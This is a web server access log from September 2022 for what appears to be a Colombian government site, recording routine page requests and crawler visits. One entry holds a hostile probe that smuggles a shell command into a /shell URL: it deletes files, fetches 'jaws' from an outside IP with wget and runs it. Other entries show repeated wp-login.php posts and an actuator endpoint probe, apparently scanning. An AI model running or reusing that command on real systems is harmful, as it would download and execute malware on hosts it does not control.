196.171.1.1 - - [24/Sep/2022:05:04:27 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [24/Sep/2022:05:04:34 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
196.171.1.1 - - [24/Sep/2022:05:04:33 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [24/Sep/2022:05:05:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:05:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:05:04:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
172.22.2.4 - - [24/Sep/2022:05:05:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:05:06:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
172.22.2.4 - - [24/Sep/2022:05:07:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [24/Sep/2022:05:08:03 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [24/Sep/2022:05:08:03 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [24/Sep/2022:05:08:05 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
185.119.81.102 - - [24/Sep/2022:05:08:05 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:05:08:06 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [24/Sep/2022:05:08:07 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [24/Sep/2022:05:08:07 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [24/Sep/2022:05:08:07 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [24/Sep/2022:05:08:07 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
207.46.13.86 - - [24/Sep/2022:05:10:29 -0500] "GET /BLA/resoluciones/00001765.tif HTTP/1.1" 404 1018
66.249.73.127 - - [24/Sep/2022:05:10:30 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:05:10:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:10:47 -0500] "HEAD / HTTP/1.1" 200 -
41.237.21.9 - - [24/Sep/2022:05:11:06 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [24/Sep/2022:05:11:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.102 - - [24/Sep/2022:05:13:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:05:13:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [24/Sep/2022:05:11:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [24/Sep/2022:05:15:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:15:47 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:05:17:38 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:05:16:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:05:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41040
157.55.39.188 - - [24/Sep/2022:05:19:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20350-399.tif HTTP/1.1" 200 4678251
201.245.192.253 - - [24/Sep/2022:05:19:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44830
172.22.2.4 - - [24/Sep/2022:05:17:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [24/Sep/2022:05:20:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:20:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:05:20:48 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [24/Sep/2022:05:22:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:05:23:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
207.46.13.40 - - [24/Sep/2022:05:25:24 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12498
201.245.192.253 - - [24/Sep/2022:05:25:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:25:47 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.202 - - [24/Sep/2022:05:29:03 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12498
201.245.192.253 - - [24/Sep/2022:05:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41040
157.55.39.188 - - [24/Sep/2022:05:29:16 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [24/Sep/2022:05:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44830
207.46.13.86 - - [24/Sep/2022:05:29:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
207.46.13.86 - - [24/Sep/2022:05:29:21 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
157.55.39.200 - - [24/Sep/2022:05:29:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=5togwftixGrZJKDI5GpCQduR.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
157.55.39.25 - - [24/Sep/2022:05:29:24 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
